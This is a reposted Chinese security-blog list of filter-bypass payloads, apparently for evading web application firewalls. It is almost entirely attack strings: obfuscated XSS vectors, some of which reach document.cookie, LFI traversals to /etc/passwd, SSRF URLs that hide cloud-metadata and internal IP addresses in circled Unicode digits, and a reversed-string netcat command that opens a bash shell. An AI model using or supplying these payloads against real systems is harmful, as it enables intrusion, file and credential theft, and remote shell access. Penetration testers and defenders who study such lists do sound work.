bypass Payload

admin 2022年5月16日10:16:07评论55 views字数 1386阅读4分37秒阅读模式




      javascript:%ef%bb%bfalert(XSS)  xss      %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F  xss      %C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd  lfi      ../../etc/passwd  lfi      <svG/x=">"/oNloaD=confirm()//  xss      http://⑯⑨。②⑤④。⑯⑨。②⑤④/  ssrf      http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/  ssrf      http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/  ssrf      http://②⑧⑤②⓪③⑨①⑥⑥:80/  ssrf      http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/  ssrf      http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥  ssrf      alert?.(document?.cookie)  xss      <x/ onpointerRawupdatE=+u0061u006cert&DiacriticalGrave;1&DiacriticalGrave;>Tocuch me!  xss    <input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">  xss    <lol/onauxclick=[0].some(alert)>rightclickhere  xss    "<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss  xss    marquee loop=1 width=0 onfinish=pru006fmpt(document.cookie)>Y000</marquee>  xss    <svg onload='new Function`["__"].find(alu0065rt)`'>  xss    <svg onload="[]['146151154164145162']['143157156163164162165143164157162'] ('141154145162164506151')()">  xss    <svg onload=&#97&#108&#101&#114&#116(1)>  xss    <svg onload='new Function`["__"].find(alu0065rt)`'>  xss    $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)  rce    <svg%09%0a%0b%0c%0d%a0%00%20onload=alert (1)>  xss      Function("x61x6cx65x72x74x28x31x29")();  xss    <svg onload=alert("")>  xss    <svg onload=alert%26%230000000040"")>  xss    <svg onx=() onload=(confirm)(1)>  xss    <object/data=javascript:alert()>  xss    <a/href="javascript%0A%0D:alert()">      -(a=alert,b="__",[b].find(a))-'  xss


原文始发于微信公众号(Khan安全攻防实验室):bypass Payload

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月16日10:16:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   bypass Payloadhttp://cn-sec.com/archives/951292.html

发表评论

匿名网友 填写信息